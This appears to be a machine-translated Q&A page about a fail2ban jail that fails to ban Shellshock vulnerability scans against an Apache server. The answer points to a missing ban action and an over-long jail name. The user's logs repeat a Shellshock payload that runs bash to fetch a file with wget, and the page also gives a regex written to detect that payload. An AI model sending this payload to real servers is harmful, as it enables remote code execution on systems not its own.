服务器 Gind.cn
  1. 服务器 Gind.cn
  3. fail2ban规则不会生效
Intereting Posts
为什么我的EC2实例使用CNAME定时? 如何做没有DNS服务器的DNSredirect? 只有局域网上的一台PC上的所有适配器丢包 validationSSL / TLS重新协商缺陷 SSD驱动器和RAIDconfiguration与LVM 将VMware映像转换为Virtualbox映像(来宾操作系统Windows Server 2008) PXE架构:“BC EFI” https不能在nginx和apache ubuntu上工作 远程桌面 – 到达的远程计算机不是您指定的计算机 JDBC通信链接失败。 iptable设置 SQL 2012中的备份压缩比差于SQL 2008 集中式审计服务器解决scheme,用于多服务器pipe理 从另一台服务器发送电子邮件时,“中继访问被拒绝” Cronjob脚本不会传入mysql密码 由root拥有的新用户目录

fail2ban规则不会生效

我在Ubuntu 14.04的股票安装上安装了Apache Web服务器,我试图使用fail2ban来阻止检查漏洞的请求。

我把/etc/fail2ban/jail.local放在了下面: 

 [apache-vulnerability-scan] enabled = true port = http,https filter = apache-vulnerability-scan logpath = /var/log/apache*/*access.log maxretry = 1

规则的定义在/etc/fail2ban/filter.d/apache-vulnerability-scan.conf

 [Definition] failregex = ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$ ignoreregex =

对于那些可能不熟悉Ubuntu的fail2ban默认规则的人来说,一些主要规则如下所示: 

 ignoreip = 127.0.0.1/8 bantime = 600 findtime = 600 maxretry = 3 backend = auto usedns = warn protocol = tcp chain = INPUT

但是,即使maxretry设置为1 ,我也能够无maxretry地提出请求,禁止我的IP。 

 10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:40 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:41 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:42 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:43 +0530] "GET /cgi-bin/ HTTP/1.1" 500 798 "-" "() { :; }; /bin/bash -c \"cd /tmp; wget http://10.0.2.2/\"" 10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)"

filter的状态似乎没问题: 

 # fail2ban-client status apache-vulnerability-scan Status for the jail: apache-vulnerability-scan |- filter | |- File list: /var/log/apache2/other_vhosts_access.log /var/log/apache 2/access.log | |- Currently failed: 0 | `- Total failed: 0 `- action |- Currently banned: 0 | `- IP list: `- Total banned: 0

似乎是规则本身: 

 Running tests ============= Use failregex file : /etc/fail2ban/filter.d/apache-vulnerability-scan.conf Use log file : /var/log/apache2/access.log Results ======= Failregex: 10 total |- #) [# of hits] regular expression | 1) [10] ^<HOST> -.*"\(\)\s*\{[^;"]+[^}"]+}\s*;.*$ | 10.0.2.2 Sat Nov 21 00:11:40 2015 | 10.0.2.2 Sat Nov 21 00:11:40 2015 | 10.0.2.2 Sat Nov 21 00:11:40 2015 | 10.0.2.2 Sat Nov 21 00:11:41 2015 | 10.0.2.2 Sat Nov 21 00:11:41 2015 | 10.0.2.2 Sat Nov 21 00:11:41 2015 | 10.0.2.2 Sat Nov 21 00:11:41 2015 | 10.0.2.2 Sat Nov 21 00:11:42 2015 | 10.0.2.2 Sat Nov 21 00:11:42 2015 | 10.0.2.2 Sat Nov 21 00:11:43 2015 `- Ignoreregex: 0 total Date template hits: |- [# of hits] date format | [13] Day/MONTH/Year:Hour:Minute:Second | [0] WEEKDAY MONTH Day Hour:Minute:Second[.subsecond] Year | [0] WEEKDAY MONTH Day Hour:Minute:Second Year | [0] WEEKDAY MONTH Day Hour:Minute:Second | [0] MONTH Day Hour:Minute:Second | [0] Year/Month/Day Hour:Minute:Second | [0] Day/Month/Year Hour:Minute:Second | [0] Day/Month/Year2 Hour:Minute:Second | [0] Month/Day/Year:Hour:Minute:Second | [0] Year-Month-Day Hour:Minute:Second[,subsecond] | [0] Year-Month-Day Hour:Minute:Second | [0] Year.Month.Day Hour:Minute:Second | [0] Day-MONTH-Year Hour:Minute:Second[.Millisecond] | [0] Day-Month-Year Hour:Minute:Second | [0] Month-Day-Year Hour:Minute:Second[.Millisecond] | [0] TAI64N | [0] Epoch | [0] ISO 8601 | [0] Hour:Minute:Second | [0] <Month/Day/Year@Hour:Minute:Second> | [0] YearMonthDay Hour:Minute:Second | [0] Month-Day-Year Hour:Minute:Second `- Lines: 13 lines, 0 ignored, 12 matched, 1 missed |- Missed line(s): | 10.0.2.2 - - [21/Nov/2015:00:11:50 +0530] "GET / HTTP/1.1" 200 11820 "-" "Wget/1.16.3 (msys)" `-

为什么fail2ban规则不会生效? 我在这里做错了什么?

对于使用的规则,您缺less一个action ,这意味着fail2ban在规则匹配时不知道该怎么做。 这可以在全局或本地为每个监狱进行configuration。 行动规则在/etc/fail2ban/action.d//etc/fail2ban/action.d/

例如,对于一个全局的诅咒,您可以在jail.local添加以下jail.local

banaction = iptables-multiport

请检查您的jail.conf文件的“行动”区域的更多细节。

由于iptables链名长度有限,你还需要缩短jail name apache-vulnerability-scan